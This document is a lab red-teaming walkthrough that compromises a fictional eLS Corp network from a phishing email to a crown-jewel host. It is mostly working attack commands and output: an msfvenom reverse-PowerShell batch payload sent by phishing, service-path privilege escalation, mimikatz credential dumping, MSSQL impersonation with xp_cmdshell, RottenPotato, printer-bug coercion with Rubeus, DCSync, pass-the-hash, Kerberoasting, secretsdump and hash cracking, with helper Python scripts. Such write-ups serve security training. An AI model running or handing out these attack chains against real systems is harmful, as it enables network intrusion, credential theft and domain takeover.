eLS Corp Red Teaming Exercise (Attack Path 1)

Contents
1 Mail Server Attack Path (Path 1)
Scenario
You have been asked to execute a (black-box) red teaming exercise against eLS Corp (including any related/trusted forest). The letter of engagement has specified:
1. The ADMIN-SYS system is the crown jewel. This means that the ultimate goal of this red teaming exercise is to obtain access to the ADMIN-SYS system.
2. During this exercise, the web application hosted on 172.16.250.2 is out of scope and must not be touched.
3. The mail server hosted on 172.16.250.2 is in scope and you can execute phishing attempts. Note that the only file type you can attach is .bat files.
4. The pentesters' network range is 172.16.25.0/24, and a static route has been configured so that pentesters can access the 172.16.250.0/24 network range, where eLS Corp assets exist.
5. For any cracking activities use the /usr/share/wordlists/rockyou.txt wordlist, included in latest Kali’s
Hints
Refer to the attack path diagram of page 1 only when you are out of options.
1 DEV-SYS Server
Scanning the accessible IP range from the scope of engagement gives us two possible entry points, both on the 172.16.250.2 host. Specifically, a TCP port scan of 172.16.250.2 shows an SMTP server on TCP port 25 and a web application on TCP port 80. According to the letter of engagement, the web application is out of scope.

    nmap -sV -p- 172.16.250.2

Let's perform banner grabbing against the SMTP service running on the target server, for example with netcat:

    nc -nv 172.16.250.2 25

The banner exposes the address "dev-user@els.corp", so a mailbox exists for this particular user and it becomes our phishing target.
Since there is no other entry point, we need to send a malicious attachment in an e-mail to "dev-user@els.corp" and wait until the attachment is opened.

We will use msfvenom to generate a malicious batch file that will be sent as an attachment to the victim. The cmd/windows/reverse_powershell payload produces a single command line, which is exactly what a .bat file can carry:

    msfvenom -p cmd/windows/reverse_powershell LHOST=<your_IP_Address> LPORT=<Listening_Port> -f raw > attachment.bat

Let's now set up our listener with Metasploit, using the same IP address and TCP port.

    msfconsole
    use exploit/multi/handler
    set payload cmd/windows/reverse_powershell
    set LHOST <your_IP_Address>
    set LPORT <Listening_Port>
    run

To send the e-mail to our target ("dev-user@els.corp") we will use the sendEmail tool, as follows.

    cat msg.txt | sendEmail -l email.log -f "sender@test.com" -u "subject" -t "dev-user@els.corp" -s "172.16.250.2:25" -o tls=no -a attachment.bat

Switches:
    -l         log file for the SMTP transaction
    -f         sender (From) address
    -u         subject
    -t         recipient (To) address
    -s         SMTP server and port
    -o tls=no  do not attempt STARTTLS (the target relay is plain SMTP on port 25)
    -a         file to attach
    The message body is read from standard input (msg.txt).

The e-mail has been sent successfully when sendEmail reports "Email was sent successfully".
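The phishing step above done from Python instead of sendEmail, as an added example that is not part of the original write-up: it builds the MIME message with the .bat attachment, refuses any other file type (the letter of engagement allows .bat only) and delivers it over plain SMTP to the in-scope relay. The sender address and subject are taken from the sendEmail command; the attachment body is a constructed placeholder standing in for the msfvenom output.

```python
"""Added example: build and send the phishing e-mail with a .bat attachment over plain SMTP.

Example code written for this write-up, not part of the original report or of
sendEmail/msfvenom. Recipient, server and port come from the scenario; the attachment
body below is a constructed stand-in for the msfvenom-generated batch file.
"""
import smtplib
from email.message import EmailMessage
from typing import Dict, List

SMTP_SERVER = "172.16.250.2"   # in-scope mail server from the letter of engagement
SMTP_PORT = 25
TARGET = "dev-user@els.corp"   # mailbox seen during SMTP banner grabbing
SENDER = "sender@test.com"     # sender address used in the sendEmail command (assumed)

# Constructed placeholder: the real attachment is the msfvenom cmd/windows/reverse_powershell
# output saved as attachment.bat. This stand-in only echoes a line so the example is harmless.
FAKE_BAT = b"@echo off\r\necho placeholder for the msfvenom-generated batch file\r\n"


def build_message(body: str, attachment: bytes, filename: str = "attachment.bat",
                  sender: str = SENDER, recipient: str = TARGET,
                  subject: str = "subject") -> EmailMessage:
    """Return a MIME message carrying a single .bat attachment.

    Only .bat attachments are permitted by the engagement, so anything else is
    rejected here instead of being sent by mistake.
    """
    if not filename.lower().endswith(".bat"):
        raise ValueError("letter of engagement: only .bat attachments are permitted")
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    # application/x-bat keeps mail clients from rendering the batch file inline as text
    msg.add_attachment(attachment, maintype="application", subtype="x-bat",
                       filename=filename)
    return msg


def attachment_names(msg: EmailMessage) -> List[str]:
    """Attachment filenames, handy for a last check before sending."""
    return [part.get_filename() for part in msg.iter_attachments()]


def send(msg: EmailMessage, server: str = SMTP_SERVER, port: int = SMTP_PORT) -> Dict:
    """Deliver the message over plain SMTP (no STARTTLS, matching -o tls=no).

    Returns the dict of refused recipients; an empty dict means the relay accepted it.
    """
    with smtplib.SMTP(server, port, timeout=10) as smtp:
        smtp.ehlo()
        return smtp.send_message(msg)


if __name__ == "__main__":
    message = build_message("Please review the attached build script.", FAKE_BAT)
    print(attachment_names(message))
    # send(message)   # uncomment on the engagement network
```

Because port 25 on the relay is open to the pentester range, no authentication is attempted; if the relay answered with an authentication requirement, smtplib would raise an SMTPException and nothing would be sent.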
As soon as the attachment is opened by the target user ("dev-user@els.corp"), the handler receives the reverse PowerShell shell and we have our initial foothold on the target user's machine.

This session can then be upgraded into a stable meterpreter session, as follows:

    use post/multi/manage/shell_to_meterpreter
    set payload_override windows/meterpreter/reverse_tcp
    set SESSION <session_ID>
    set LHOST 172.16.25.x
    set LPORT <listening_port>
    run

or, equivalently, from the msfconsole prompt:

    sessions -u <session_ID>
We now have a stable Meterpreter session with "dev-user" domain user rights. We next need to enumerate the environment and elevate our privileges in order to move forward in the network.

Enumerating the services and the permissions dev-user holds on them (for example with Sysinternals accesschk: accesschk.exe -uwcqv dev-user *) shows that we, as "dev-user", have FULL CONTROL over the SNMPTRAP service. Its configuration is as follows:

    sc qc snmptrap

    SERVICE_NAME: snmptrap
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : SNMP Trap
            DEPENDENCIES       :
            SERVICE_START_NAME : .\Administrator
Since we have full control over this service, and the service runs as the local Administrator account (SERVICE_START_NAME), we can elevate our privileges to local administrator by pointing the service binary path at a command that adds dev-user to the "Administrators" group. Keep the output of sc qc so the original path can be restored at the end of the engagement.

    sc stop snmptrap
    sc config snmptrap binPath= "net localgroup Administrators dev-user /add"
    sc start snmptrap

Note the syntax: sc requires the space after "binPath=". Starting the service reports error 1053 (the service did not respond in a timely fashion) because net.exe is not a real service binary, but by then the command has already run under the service account. Exit the shell and spawn a new shell from the meterpreter prompt. "Dev-User" can now be found as a member of the local Administrators group.

    net localgroup Administrators

    Members
    -------------------------------------------------------------------------------
    Administrator
    ELS-CHILD\dev-user
    ELS-CHILD\Domain Admins
A database connection configuration file is located on the Administrator's Desktop, but we still cannot read it: group membership is evaluated when a logon token is created, so the token of our existing session does not yet carry the Administrators group.

To view the file we can instead impersonate the token of the local Administrator on DEV-SYS, as follows.

    load incognito
    list_tokens -u

    Delegation Tokens Available
    ========================================
    DEV-SYS\Administrator
    ELS-CHILD\dev-admin
    ELS-CHILD\dev-user
    [..SNIP..]

    impersonate_token "DEV-SYS\\Administrator"

Now, as DEV-SYS\Administrator, we can view the file located on the Administrator's Desktop. The IP address of a database server is clearly visible in the file.
As part of our post-exploitation activities we will dump the credentials cached on this machine; they are what will let us move laterally.

First migrate to an x64 process and load the kiwi module, then dump the credentials.

    migrate <x64_pid>
    load kiwi
    creds_all

    [..SNIP..]
    msv :
     [00000003] Primary
     * Username : dev-admin
     * Domain   : ELS-CHILD
     * NTLM     : 7b53c60e9113cc8b194cb34de4805f3b
     * SHA1     : 72fd2c3d682d3957fd6b8523dd86cc12ba51aef2
     * DPAPI    : f5cfd88d690e1e9338e2ed8162a6b6b4
    tspkg :
    wdigest :
     * Username : dev-admin
     * Domain   : ELS-CHILD
     * Password : H@rdP@ssD!ff!cult964!!
    kerberos :
     * Username : dev-admin
     * Domain   : ELS-CHILD.ELS.CORP
     * Password : (null)
    ssp :
    credman :
    [..SNIP..]

"dev-admin" (domain user) credentials have been discovered; the wdigest provider even holds the clear-text password. Now let's add a route to the 10.10.1.0/24 network discovered in the configuration file, through the DEV-SYS session, so that Metasploit modules can reach it.

    background
    route add 10.10.1.0/24 <session_ID>
2 DB-SRV Server
A ping sweep of the 10.10.1.0/24 network through the DEV-SYS session shows which hosts are alive.

    use post/multi/gather/ping_sweep
    set RHOSTS 10.10.1.0/24
    set SESSION <session_ID>
    run
    [..SNIP..]

Scanning the discovered 10.10.1.2 host for open TCP ports shows that TCP port 1433 (MS SQL) is open.

The discovered "dev-admin" credentials can be sprayed across the target network. Metasploit's scanner/mssql/mssql_login module checks whether a SQL instance on the specified machine accepts them; because dev-admin is a domain account, Windows authentication must be selected.

    use auxiliary/scanner/mssql/mssql_login
    set RHOSTS 10.10.1.2
    set USERNAME dev-admin
    set PASSWORD H@rdP@ssD!ff!cult964!!
    set DOMAIN ELS-CHILD
    set USE_WINDOWS_AUTHENT true
    run

Trying to enable "xp_cmdshell" to obtain a shell on the DB-SRV machine fails because the dev-admin login lacks the rights to change server configuration (it is not a sysadmin).

After enumeration, it was found that the dev-admin login holds the IMPERSONATE permission on the "sa" login, so it can switch to sa with EXECUTE AS LOGIN and act with sa's privileges. Metasploit's mssql_escalate_execute_as module abuses this and adds dev-admin to the sysadmin fixed server role.

    use auxiliary/admin/mssql/mssql_escalate_execute_as
    set RHOSTS 10.10.1.2
    set USERNAME dev-admin
    set PASSWORD H@rdP@ssD!ff!cult964!!
    set DOMAIN ELS-CHILD
    set USE_WINDOWS_AUTHENT true
    run
With sysadmin privileges we can now enable "xp_cmdshell" and use it to establish a stable bind shell on the DB-SRV server with Metasploit's mssql_payload exploit. A bind payload is used because the session is reached through the route added on DEV-SYS.

    use exploit/windows/mssql/mssql_payload
    set RHOSTS 10.10.1.2
    set USERNAME dev-admin
    set PASSWORD H@rdP@ssD!ff!cult964!!
    set DOMAIN ELS-CHILD
    set USE_WINDOWS_AUTHENT true
    set payload windows/meterpreter/bind_tcp
    run

Metasploit enables xp_cmdshell through sp_configure and uses it to stage the payload (a VBS dropper written to the target) on DB-SRV.

We are now running as the SQL Server service account and need to escalate privileges on DB-SRV. Listing the privileges of that account (whoami /priv) shows that it holds "SeImpersonatePrivilege" and "SeAssignPrimaryTokenPrivilege", so we can use the well-known RottenPotato exploit to escalate to "NT AUTHORITY\SYSTEM".
On the meterpreter prompt, escalate to "NT AUTHORITY\SYSTEM" as follows. RottenPotato coerces a SYSTEM process into authenticating to a local listener and turns that authentication into an impersonation token, which incognito can then adopt.

    upload rotten_potato.exe C:\\Users\\Public\\rotten.exe
    cd C:\\Users\\Public
    execute -Hc -f rotten.exe
    load incognito
    list_tokens -u
    impersonate_token "NT AUTHORITY\\SYSTEM"
    getuid
    shell
Now we will check whether any type of Kerberos delegation is enabled on this server; the AD module or PowerView can both confirm it. Let's use the AD module, uploading its DLL so that it can be imported from a PowerShell prompt.

    upload Microsoft.ActiveDirectory.Management.dll C:\\Users\\Public\\Microsoft.ActiveDirectory.Management.dll

Then, from PowerShell:

    Import-Module C:\Users\Public\Microsoft.ActiveDirectory.Management.dll
    Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

DB-SRV is configured with Unconstrained Delegation! Any account that authenticates to DB-SRV with Kerberos leaves a forwarded TGT in DB-SRV's LSASS memory, so let us leverage this and try to force a privileged account to connect to the DB-SRV server.
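The delegation check as a small classifier, added here as an example and not part of the report, PowerView or the AD module: it decodes the userAccountControl bits together with the two delegation attributes and singles out hosts like DB-SRV where unconstrained delegation is a finding rather than the default (domain controllers always carry the flag, so the Get-ADComputer filter above lists ELS-DC as well and must be read with that in mind). The computer objects are constructed; WEB01$ is hypothetical.

```python
"""Added example: classify Kerberos delegation from directory attributes.

Example code for this write-up, not part of the original report, PowerView or the AD module.
The computer objects below are constructed; in practice they come from
Get-ADComputer -Filter * -Properties userAccountControl,msDS-AllowedToDelegateTo,
msDS-AllowedToActOnBehalfOfOtherIdentity (or an LDAP search) and are fed to classify_all().
"""
from typing import Dict, List

# userAccountControl bits that matter for delegation (documented in MS-ADTS / MS-SAMR)
WORKSTATION_TRUST_ACCOUNT = 0x1000          # ordinary domain-joined computer
SERVER_TRUST_ACCOUNT = 0x2000               # the object is a domain controller
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition


def delegation_type(obj: Dict) -> str:
    """'unconstrained', 'constrained', 'constrained-protocol-transition', 'rbcd' or 'none'."""
    uac = int(obj.get("userAccountControl", 0))
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if obj.get("msDS-AllowedToDelegateTo"):            # classic constrained delegation
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:       # S4U2Self allowed: any user can be impersonated
            return "constrained-protocol-transition"
        return "constrained"
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):  # resource-based constrained delegation
        return "rbcd"
    return "none"


def is_domain_controller(obj: Dict) -> bool:
    return bool(int(obj.get("userAccountControl", 0)) & SERVER_TRUST_ACCOUNT)


def classify_all(objects: List[Dict]) -> List[Dict]:
    """Annotate every object with its delegation type and whether it is a DC."""
    return [{"name": o["name"], "delegation": delegation_type(o), "dc": is_domain_controller(o)}
            for o in objects]


def unconstrained_targets(objects: List[Dict]) -> List[str]:
    """Non-DC hosts with unconstrained delegation.

    Every DC has the flag by design, so those are not findings; any other host is a place
    where coerced authentication (printer bug) hands you the connecting account's TGT.
    """
    return [r["name"] for r in classify_all(objects)
            if r["delegation"] == "unconstrained" and not r["dc"]]


# Constructed sample: the lab's DC, DB-SRV as the report finds it, a hypothetical WEB01$
# with constrained delegation and protocol transition, and a plain workstation.
SAMPLE_COMPUTERS = [
    {"name": "ELS-DC$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"name": "DB-SRV$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"name": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/db-srv.els.corp"]},
    {"name": "DEV-SYS$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
]

if __name__ == "__main__":
    for row in classify_all(SAMPLE_COMPUTERS):
        print(f"{row['name']:10} dc={row['dc']!s:5} delegation={row['delegation']}")
    print("coercion targets:", unconstrained_targets(SAMPLE_COMPUTERS))
```

The same bits apply to user accounts with SPNs, so the function can be run over Get-ADUser output as well; an account in "Protected Users" or marked "sensitive and cannot be delegated" will never leave a forwardable TGT, which is the defensive counterpart of this check.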
With SYSTEM privileges, we will now abuse the well-known printer bug (the MS-RPRN RpcRemoteFindFirstPrinterChangeNotificationEx call) to make the els.corp Domain Controller authenticate to DB-SRV, which leaves its TGT in memory. Upload "Rubeus.exe" and "MS-RPRN.exe" to the DB-SRV server, run Rubeus in monitor mode in one shell and, in a second one, coerce "els-dc" to connect, as follows.

On the meterpreter prompt:

    shell
    Rubeus.exe monitor /interval:5 /filteruser:ELS-DC$ /nowrap
    CTRL+Z   (background channel 1, answer "y" so Rubeus keeps running)
    shell
    MS-RPRN.exe \\els-dc.els.corp \\db-srv.els.corp
    CTRL+Z   (background channel 2)
    channel -i 1
    (the base64-encoded TGT of ELS-DC$ appears in Rubeus's output)

If the following message appears while executing MS-RPRN.exe, the coerced connection from "els-dc" has most likely worked.

'Attempted printer notification and received an invalid handle. The coerced authentication probably worked!'
What Rubeus captured is not a hash but the DC's TGT as a base64-encoded kirbi blob. Strip any whitespace or line breaks it picked up when copied and import it into the current logon session (pass-the-ticket), so that requests to the "els-dc" domain controller are made as ELS-DC$. From a PowerShell prompt:

    $tgt = ('base64_encoded_ticket') -replace '\s', ''
    .\Rubeus.exe ptt /ticket:$tgt
Now, with the "ELS-DC$" ticket active in the current logon session, we will use Mimikatz to perform a DCSync attack against the "els.corp" domain.

In the meterpreter session:

    shell

In the command channel:

    C:\Users\Public\mimikatz.exe
    privilege::debug
    lsadump::dcsync /domain:els.corp /user:els-admin

We are able to perform a DCSync because a domain controller's computer account holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object (through the Domain Controllers and Enterprise Domain Controllers groups), which is exactly what the directory replication service checks before answering. The output includes the NTLM hash of "els-admin", a Domain Admin of els.corp.
3 ELS-DC Server
With the "els-admin" domain admin credentials we can obtain a stable, persistent shell on ELS-DC.

Use Metasploit's exploit/windows/smb/psexec module to establish a connection with the target machine; it accepts either the clear-text password or the NTLM hash recovered by DCSync (pass-the-hash, in LMhash:NThash form).

    use exploit/windows/smb/psexec
    set RHOSTS <els-dc_IP>
    set SMBDomain els.corp
    set SMBUser els-admin
    set SMBPass <password or LMhash:NThash>
    set payload windows/meterpreter/bind_tcp
    run

From the new session, upload PowerView.ps1 with the meterpreter upload command and import it from a PowerShell prompt to continue enumeration.
Using PowerView, we will enumerate any misconfiguration we can abuse across the cross-forest trust established between "ELS.CORP" and "MGMT.CORP".

With the following query we enumerate accounts that have a service principal name (SPN) set in the domains on the other side of the trust. Kerberoasting works across forest trusts: all we need is a service ticket (TGS) for an account with an SPN, and our own KDC will refer us to the trusted domain to obtain it.

    Get-NetDomainTrust | ? {$_.TrustType -ne 'External'} | %{Get-NetUser -SPN -Domain $_.TargetName}
    <..SNIP..>
It can clearly be seen that a domain user of the MGMT domain, "spn_svc", has an SPN set, so it is possible to request its service ticket, as follows:

    <..SNIP..>
    SamAccountName       : UNKNOWN
    DistinguishedName    : UNKNOWN
    ServicePrincipalName : http/mgmt-dc.mgmt.corp
    TicketByteHexStream  :
    <..SNIP..>

To keep only the crackable part of the Kerberoast output, filter out the Hash field and export it as follows. The field is already in the $krb5tgs$ format that John (--format=krb5tgs) and hashcat (-m 13100) accept.

    Invoke-Kerberoast -Domain mgmt.corp | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
The password of the service account ('spn_svc') is recovered by cracking the exported ticket against the rockyou wordlist.

Credentials: spn_svc / B@DB!tch

The domain user "spn_svc" of "MGMT.corp" is also a member of the Administrators group on the MGMT-DC domain controller.

The IP address of MGMT-DC can be found with a simple ping command or an nslookup DNS query: 10.10.3.2
4 MGMT-DC Server
On the current meterpreter session add a route to the "10.10.3.0/24" network and then start a SOCKS server, so that tools on the attacker machine can reach MGMT-DC.mgmt.corp through the pivot.

    background
    route add 10.10.3.0/24 <session_ID>

Start the SOCKS server to route traffic through the established meterpreter session:

    use auxiliary/server/socks4a
    set SRVHOST 172.16.25.x
    run -j

Point proxychains at it and give the DC a name:

    nano /etc/proxychains.conf
    socks4 172.16.25.x 1080

    nano /etc/hosts
    10.10.3.2 MGMT-DC.MGMT.CORP

Switch to PowerShell on ELS-DC. We will use the Active Directory module present on the server to list the OUs of the MGMT.CORP domain and the members of each OU.

    Get-ADOrganizationalUnit -Filter * -Server mgmt-dc.mgmt.corp | Select-Object Name, DistinguishedName
    Get-ADUser -Filter * -SearchBase "<OU_DistinguishedName>" -Server mgmt-dc.mgmt.corp
The domain user "Jump-Admin" found in the "Bastion-Host" OU can be useful for moving forward from the MGMT-DC server. The IP address of the "jump-srv" server can be enumerated by querying its DNS record.

    <..SNIP..>
    Name: jump-srv.mgmt.corp
    IP Address: 10.10.3.3
    <..SNIP..>

Rather than hunting for jump-admin's password, we will extract all the credentials of the MGMT.CORP domain with impacket's secretsdump.py; the spn_svc credentials, which are administrative on MGMT-DC, are sufficient for this. On a new bash prompt, through our SOCKS route to the 10.10.3.0/24 network, execute secretsdump.py as follows. The password is entered at the prompt rather than on the command line, because its "@" would be mistaken for the user/host separator.

    proxychains secretsdump.py mgmt.corp/spn_svc@10.10.3.2
    Password:
    [..SNIP..]

Crack the "jump-admin" NT hash with John by storing it in a file.
→ Crack the jump-admin hash (2dc9bff397f9e6c9f08a05b18145a7b6):

    echo '2dc9bff397f9e6c9f08a05b18145a7b6' > jump-admin.nt
    john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt jump-admin.nt
    john --format=NT --show jump-admin.nt

The hash cracks and we now have the clear-text credentials of the "jump-admin" user, the administrator of the "jump-srv" machine.
We will now perform port scanning against the newly discovered IP address.
5 Jump-Srv
Let's perform a TCP port scan against 10.10.3.3 (jump-srv.mgmt.corp) using nmap through our SOCKS route to the 10.10.3.0/24 network. Only full TCP connect scans traverse a SOCKS proxy and ICMP does not, so use -sT and -Pn.

    proxychains nmap -sT -Pn -n --top-ports 100 10.10.3.3
    <..SNIP..>

An SSH server is running on TCP port 22. As the jump-srv.mgmt.corp machine is managed by "jump-admin", we can try to SSH into 10.10.3.3 with the Jump-Admin domain user and the password we just cracked.

    proxychains ssh jump-admin@10.10.3.3
Let's also extract the Firefox bookmark and history URLs on this machine (as the jump-admin user) and look for interesting information. Firefox keeps them in places.sqlite inside the profile directory (typically ~/.mozilla/firefox/<profile>/); the running browser holds a lock on that file, so work on a copy.

    cp ~/.mozilla/firefox/<profile>/places.sqlite /tmp/places.sqlite
    sqlite3 /tmp/places.sqlite

Inside SQLite:

    .tables
    select moz_places.url from moz_places;
    .quit

Found URL: https://admin-sys.site/login.asp?user=sys-admin&pass=Rand0mlyS3l3ctedP@ss
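The bookmark extraction as a script, added here as an example that is not part of the report: it reads every URL from a places.sqlite and flags the ones carrying credentials in the userinfo or query string, which is exactly how the admin-sys login above leaks. The database is a constructed in-memory stand-in with Firefox's moz_places column names; the intranet and ftp rows are made up for the example. On jump-srv, open a copy of the real profile file with open_places() instead.

```python
"""Added example: pull URLs from a Firefox places.sqlite and flag credentials embedded in them.

Example code for this write-up, not part of the original report. build_sample_db() creates
a constructed stand-in for places.sqlite with Firefox's moz_places column names; on jump-srv
you would instead call open_places() on a copy of ~/.mozilla/firefox/<profile>/places.sqlite.
"""
import sqlite3
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# query-string keys that usually carry secrets; matched case-insensitively
CRED_KEYS = {"user", "username", "login", "pass", "password", "pwd", "token", "apikey", "key"}


def open_places(path: str) -> sqlite3.Connection:
    """Open a places.sqlite read-only (Firefox locks the live file, so work on a copy)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def extract_urls(conn: sqlite3.Connection) -> List[str]:
    """Every URL Firefox has stored; history and bookmarks both reference moz_places."""
    rows = conn.execute("SELECT url FROM moz_places WHERE url IS NOT NULL ORDER BY id")
    return [row[0] for row in rows]


def credentials_in_url(url: str) -> Dict[str, str]:
    """Credential-looking parts of a URL: userinfo (user:pass@host) and matching query parameters."""
    parts = urlsplit(url)
    found: Dict[str, str] = {}
    if parts.username:
        found["user"] = parts.username
        if parts.password:
            found["pass"] = parts.password
    for key, values in parse_qs(parts.query).items():
        if key.lower() in CRED_KEYS:
            found[key] = values[0]
    return found


def find_leaked_credentials(urls: List[str]) -> List[Dict[str, str]]:
    """One record per URL that carries credentials, with the host they apply to."""
    hits = []
    for url in urls:
        creds = credentials_in_url(url)
        if creds:
            hits.append({"host": urlsplit(url).hostname or "", "url": url, **creds})
    return hits


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for places.sqlite (only the columns this example needs)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT)")
    conn.executemany("INSERT INTO moz_places (url, title) VALUES (?, ?)", [
        ("https://www.mozilla.org/", "Mozilla"),
        ("https://admin-sys.site/login.asp?user=sys-admin&pass=Rand0mlyS3l3ctedP@ss", "admin"),  # from the write-up
        ("https://intranet.mgmt.corp/wiki?page=onboarding", "wiki"),                             # constructed
        ("ftp://deploy:s3cret@files.mgmt.corp/", "files"),                                        # constructed
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for hit in find_leaked_credentials(extract_urls(build_sample_db())):
        print(hit)
```

The query string is parsed after the URL is split, so an "@" inside a parameter value (as in the admin-sys password above) is not mistaken for the userinfo separator; the read-only URI mode is there so that a profile copied from a live machine is never modified by the triage.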
However, opening the login URL with Firefox through proxychains shows that the page does not exist. The name still resolves: pinging admin-sys.site from jump-srv gives its IP address, 192.168.1.2, on a network that is only reachable from the jump host.

A TCP port scan of the "192.168.1.2" target reveals that port 5985 (WinRM over HTTP) is open, which means we can use PowerShell Remoting.
6 Admin-SYS
In order to perform PowerShell Remoting we need to apply some port forwarding. Exit the SSH session and re-establish it with a local port forward:

    proxychains ssh -L 5985:192.168.1.2:5985 jump-admin@10.10.3.3

With this forward, all traffic sent to port 5985 on the attacker machine is carried over the SSH session to the "admin-sys" server (192.168.1.2). At this point traffic from the attacker machine can reach admin-sys, and a WinRM client (for example evil-winrm) can be pointed at 127.0.0.1:5985 with the sys-admin credentials recovered from the bookmark.

Enumerating the environment reveals that "sys-admin" is a local user on the admin-sys server. Privilege escalation can be done by querying the autologon values in the registry.
On the recently established WinRM session:

    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

    <..SNIP..>
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
        AutoRestartShell      REG_DWORD    0x1
        Background            REG_SZ       0 0 0
        CachedLogonsCount     REG_SZ       10
        DebugServerCommand    REG_SZ       no
        DefaultUserName       REG_SZ       Administrator
        DefaultDomainName     REG_SZ       WIN-10-PRO-X64
        AutoAdminLogon        REG_SZ       1
        DefaultPassword       REG_SZ       Test@123
    <..SNIP..>

AutoAdminLogon is set to 1 and DefaultPassword is stored in clear text, so the local Administrator password of ADMIN-SYS is Test@123. Logging on with it gives administrative access to the crown jewel, which completes the objective of the engagement.

Congratulations!!